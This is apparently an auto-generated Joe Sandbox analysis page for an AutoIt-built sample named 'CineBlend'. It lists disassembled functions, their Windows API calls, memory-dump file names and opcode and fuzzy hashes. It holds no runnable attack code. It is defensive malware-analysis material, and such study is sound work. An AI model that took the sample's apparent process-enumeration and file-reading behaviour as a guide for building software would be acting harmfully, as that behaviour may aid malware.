Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 77ab62051a9ea606f571b877a9ee527b8f5f1b7112898789a1f0aedda2094c72
Instruction ID: cae0fa68a45de87d5e09cf6003553bd207d572e10f4b15e77e04ef22bee4c82c
Opcode Fuzzy Hash: 77ab62051a9ea606f571b877a9ee527b8f5f1b7112898789a1f0aedda2094c72
Instruction Fuzzy Hash: 47F0DA756403947AE73157176C0CF3B3EBDD7CAF50B02102EBA04A7170D6795851DAB0

Function 00BA1196 Relevance: 9.1, APIs: 6, Instructions: 107
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00BA11B3
ReadFile.KERNELBASE(?,?,0000FFFF,?,00000000), ref: 00BA11EE
EnterCriticalSection.KERNEL32(?), ref: 00BA120A
LeaveCriticalSection.KERNEL32(?), ref: 00BA1283
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00BA129A
InterlockedExchange.KERNEL32(?,000001F6), ref: 00BA12C8

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 416e2c8ad1d2fe3e19efc581dc22f16225ec3a625e0313a1d678b045f9f73f87
Instruction ID: e130c4ead628eb647297a0f469b969f379ead5d9068023a551f2851494606b3b
Opcode Fuzzy Hash: 416e2c8ad1d2fe3e19efc581dc22f16225ec3a625e0313a1d678b045f9f73f87
Instruction Fuzzy Hash: 9E414971900204ABDF04AF58DC85BAAB7B8FF49310F1484E5FE00AB296DB30DE55DBA4

Function 00B361A9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B75287

Part of subcall function 00B38577: _wcslen.LIBCMT ref: 00B3858A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B36299

Strings

Line %d: , xrefs: 00B75305
AutoIt - , xrefs: 00B3620D

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line %d: $AutoIt -
API String ID: 2289894680-4094128768
Opcode ID: d968b1f6f632465cea293000fe1db20df8e6d85416387faf2095396e2004e49d
Instruction ID: 3d6a23be9182e72e31ebbf6a9695522868d51366f12590c7df1dcd25ece48ea0
Opcode Fuzzy Hash: d968b1f6f632465cea293000fe1db20df8e6d85416387faf2095396e2004e49d
Instruction Fuzzy Hash: F6419571408304AAC724EB60DC45FDFB7ECEF45320F2085AEF599920A1EF749649C796

Function 00B358CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00B358BE,SwapMouseButtons,00000004,?), ref: 00B358EF
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00B358BE,SwapMouseButtons,00000004,?), ref: 00B35910
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00B358BE,SwapMouseButtons,00000004,?), ref: 00B35932

Strings

Control Panel\Mouse, xrefs: 00B358ED

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 4ba6116fbe15de28cf31c9058a71195b7fb322cc3be37489e67698a1f992388d
Instruction ID: 80441fa4be2327471036e68700796062d1694b587dba1558a76e32e9939fc3d1
Opcode Fuzzy Hash: 4ba6116fbe15de28cf31c9058a71195b7fb322cc3be37489e67698a1f992388d
Instruction Fuzzy Hash: 1D112AB5511618FFDB218F68DC84EAEB7F8EF45760F2045A9E805E7210E631AE419760

Function 00B3F6D0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00B848C6

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: c085daaaec43b235393c690be1689557674e695c748c0038e0ed35e50bf483bc
Instruction ID: d453fdffff1c789ce4132606660f6648259f78b8c36db008b35b9e59b97c8530
Opcode Fuzzy Hash: c085daaaec43b235393c690be1689557674e695c748c0038e0ed35e50bf483bc
Instruction Fuzzy Hash: 92C24575E00616DFCB24DF98C880BADB7F1FF19310F2481A9E905AB2A1D775AE41CB91

Function 00B5014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00B509D8

Part of subcall function 00B53614: RaiseException.KERNEL32(?,?,?,00B509FA,74DE2E40,?,?,?,?,?,?,?,00B509FA,?,00BF9758), ref: 00B53674

__CxxThrowException@8.LIBVCRUNTIME ref: 00B509F5

Strings

Unknown exception, xrefs: 00B50A02

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: e29d199691a2688e71e638e51bc66a119b20fc5b0d49209622007a37ea4e5e90
Instruction ID: 4340cd7452a77a593a903c3175241878ac0910392b55a0f83dc29b2511c7859b
Opcode Fuzzy Hash: e29d199691a2688e71e638e51bc66a119b20fc5b0d49209622007a37ea4e5e90
Instruction Fuzzy Hash: B7F0283081060C778B00BAA8DC56BAE77EC9E00352B6040E5BD24A65E2FB70EA1DC6C0

Function 00BB89B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00BB8D52
TerminateProcess.KERNEL32(00000000), ref: 00BB8D59
FreeLibrary.KERNEL32(?,?,?,?), ref: 00BB8F3A

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 1ef17e535b3c69eb6ed69f06767b8ab2dc1b5d5c1cc90123dbf493805c8a598b
Instruction ID: 0a092a0b8398757245079f87cf4331d2c44be038ff1249f83d03d801aaadfe44
Opcode Fuzzy Hash: 1ef17e535b3c69eb6ed69f06767b8ab2dc1b5d5c1cc90123dbf493805c8a598b
Instruction Fuzzy Hash: 29125B71A083419FC714DF28C484B6ABBE5FF88314F14899DF8899B392DB71E945CB92

Function 00BB9AF3 Relevance: 4.7, APIs: 3, Instructions: 233COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BB9B87
_strcat.LIBCMT ref: 00BB9BC6
_wcslen.LIBCMT ref: 00BB9C14

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: _wcslen$_strcat
String ID:
API String ID: 306214811-0
Opcode ID: 8d2ee378a5b01580be468244e7506375f8cea0dc7eb6ddd00a97f7a6c5a47970
Instruction ID: c55542e111c761d4dc95f095d8c74d6fb4adc2ae2fc31440e94576f91808af69
Opcode Fuzzy Hash: 8d2ee378a5b01580be468244e7506375f8cea0dc7eb6ddd00a97f7a6c5a47970
Instruction Fuzzy Hash: D6A14831604605EFCB18DF18C5D1AA9BBE1FF45314B2084EDE95A9F292DB71ED46CB80

Function 00B32793 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B332AF
Part of subcall function 00B3327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00B332B7
Part of subcall function 00B3327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B332C2
Part of subcall function 00B3327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B332CD
Part of subcall function 00B3327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00B332D5
Part of subcall function 00B3327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00B332DD

Part of subcall function 00B33205: RegisterWindowMessageW.USER32(00000004,?,00B32964), ref: 00B3325D

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00B32A0A
OleInitialize.OLE32 ref: 00B32A28
CloseHandle.KERNELBASE(00000000,00000000), ref: 00B73A0D

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: e44533937f5ea2f239cbe2363b21b76925e354c4de832d8236506184e958ef14
Instruction ID: 2bb981a5e486edb7ff72a358cbc1b806658acbf323ff156de29008ee666a0f0e
Opcode Fuzzy Hash: e44533937f5ea2f239cbe2363b21b76925e354c4de832d8236506184e958ef14
Instruction Fuzzy Hash: 1B719EB99152008FCB88EF79ED6DB1D7AE4FB48304B5282AEE109C72B1EB704545DF58

Function 00B68A2E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,00B6894C,?,00BF9CE8,0000000C), ref: 00B68A84
GetLastError.KERNEL32(?,00B6894C,?,00BF9CE8,0000000C), ref: 00B68A8E
__dosmaperr.LIBCMT ref: 00B68AB9

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 9674281c02d610f942c206abc1fc96c010f5b31efb063d5b767704efce1a2f06
Instruction ID: ceb4506c860b8c5a874c4f06198e2c452005fb17ab8d3a4e87041ecc3a6ea111
Opcode Fuzzy Hash: 9674281c02d610f942c206abc1fc96c010f5b31efb063d5b767704efce1a2f06
Instruction Fuzzy Hash: B60149336055605AC63462F4AC86B7E67C9CB81734F2903DAFD148B1D2DF3C8D818591

Function 00B6970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00B697BA,FF8BC369,00000000,00000002,00000000), ref: 00B69744
GetLastError.KERNEL32(?,00B697BA,FF8BC369,00000000,00000002,00000000,?,00B65ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00B56F41), ref: 00B6974E
__dosmaperr.LIBCMT ref: 00B69755

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 2c791b99fdc5366d18114e9ada3cdbb21dce935705f8bedbb30c8cad776684da
Instruction ID: 008ade78274abab1c0d6ebf234ba3b55498c6fd560da50ebbb482116fc246cc9
Opcode Fuzzy Hash: 2c791b99fdc5366d18114e9ada3cdbb21dce935705f8bedbb30c8cad776684da
Instruction Fuzzy Hash: 72014736720515ABCB159FA9DC45DBE7BAEEB85330B280299FC119B190EB34DD41CB90

Function 00BA0D18 Relevance: 4.5, APIs: 3, Instructions: 21COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000030,00000000,?,00000002,00000000,?,00BA0B03,00000000,?,00000000,?,00B73A00,00000000), ref: 00BA0D2E
GetCurrentProcess.KERNEL32(?,00000000,?,00BA0B03,00000000,?,00000000,?,00B73A00,00000000), ref: 00BA0D36
DuplicateHandle.KERNELBASE(00000000,?,00BA0B03,00000000,?,00000000,?,00B73A00,00000000), ref: 00BA0D3D

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CurrentProcess$DuplicateHandle
String ID:
API String ID: 1294930198-0
Opcode ID: 0555cb868e00910f0a02d1467f7abb3803358bad04059c53117bd2cd2d2d352c
Instruction ID: bd4794c97487985a9899d77a61b0799be5509e257c1257009457400249a6ab81
Opcode Fuzzy Hash: 0555cb868e00910f0a02d1467f7abb3803358bad04059c53117bd2cd2d2d352c
Instruction Fuzzy Hash: 06D05E7B154305BBC7022BD5EC09F3B7BBCDBDAB22F14407AFA0997150AE7194019625

Function 00B42B20 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00B43006

Strings

CALL, xrefs: 00B42FD6

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 1953227ebd4f3349470c2a8f123036e1065fa1f05ff08ee0083dc3ee71725f33
Instruction ID: 3b8fd7e20ee5622acdd871edf682633903401bedc779a9f739b311c48728cbc9
Opcode Fuzzy Hash: 1953227ebd4f3349470c2a8f123036e1065fa1f05ff08ee0083dc3ee71725f33
Instruction Fuzzy Hash: 05229D706082019FC714DF14C884B2ABBF1FF94314F6449ADF49A8B3A2DB71EA45EB52

Function 00B33A95 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00B7413B

Part of subcall function 00B35851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B355D1,?,?,00B74B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00B35871

Part of subcall function 00B33A57: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B33A76

Strings

X, xrefs: 00B74109

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: abdb9654bc3e835a69bfdb998abc60427a53757b41ee4d2e03996d06ab94d1c9
Instruction ID: 6a1b5bcc7c36d6a9ab036a9cd254a617b57f9fa9063da918728c7c21eb9edc0a
Opcode Fuzzy Hash: abdb9654bc3e835a69bfdb998abc60427a53757b41ee4d2e03996d06ab94d1c9
Instruction Fuzzy Hash: 3721AE71A002589BDB01DF98C805BEE7BFCAF49300F108099E549A7241DFB89A8D8FA1

Function 00B4FFE0 Relevance: 3.1, APIs: 2, Instructions: 94processCOMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 00B5007D
CreateToolhelp32Snapshot.KERNEL32 ref: 00B5008F

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CloseCreateHandleSnapshotToolhelp32
String ID:
API String ID: 3280610774-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 99e9f78d01837ebdbe5ce2132b4d26a8164f307899cc874e5c20226704de72c1
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: E131C770A10109DBC719EF58D590B69F7E6FB49301B6886E5E809CB292D731EDC5CBC0

Function 00B3396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B33A3C

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 9d80e3c77a639d6f8772f6cc7d69e7b02ace1f0028319bd3b17fa6f919b0945d
Instruction ID: 5271857654126f9b4a8b0b06905cc480a4e3b21e7e27201a091693219de8efac
Opcode Fuzzy Hash: 9d80e3c77a639d6f8772f6cc7d69e7b02ace1f0028319bd3b17fa6f919b0945d
Instruction Fuzzy Hash: 2131D570604300CFD720DF24D889B9BBBE8FB48709F10096EE6DA87290E770A948CB52

Function 00B64EB8 Relevance: 3.1, APIs: 2, Instructions: 67COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00B64F04
GetFileType.KERNELBASE(00000000), ref: 00B64F16

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: c77ff0a4dc27c2b9ef1684e574d7626f758ae8beaa1e0c9dbefa5dda2d113da7
Instruction ID: c55fa579765f46012bb43da6a7b01141382cbe4a066b6f9cdf6af31fc812b17f
Opcode Fuzzy Hash: c77ff0a4dc27c2b9ef1684e574d7626f758ae8beaa1e0c9dbefa5dda2d113da7
Instruction Fuzzy Hash: C111D331108F424AC7348E3D9CD8622BAD5EB97330B3807AAE5BAC75F1C779DD829640

Function 00BA0AC4 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00000018,00000FA0,?,00000000,?,00B73A00,00000000), ref: 00BA0AEC
InterlockedExchange.KERNEL32(00000038,00000000), ref: 00BA0B0E

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
String ID:
API String ID: 4104817828-0
Opcode ID: 53a7eddc9e24d58f048e1be1358b74569ad886b87749f41fc39bc531b0e32826
Instruction ID: 1a7775840fecd47def1b55c249ca7d207e9a497d69d560db34d35c48ea4d47ac
Opcode Fuzzy Hash: 53a7eddc9e24d58f048e1be1358b74569ad886b87749f41fc39bc531b0e32826
Instruction Fuzzy Hash: 39F017B15007059BC3209F56D9448A7FBFCFF95720B40482EE48687A20CBB4B485CB90

Function 00B3331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

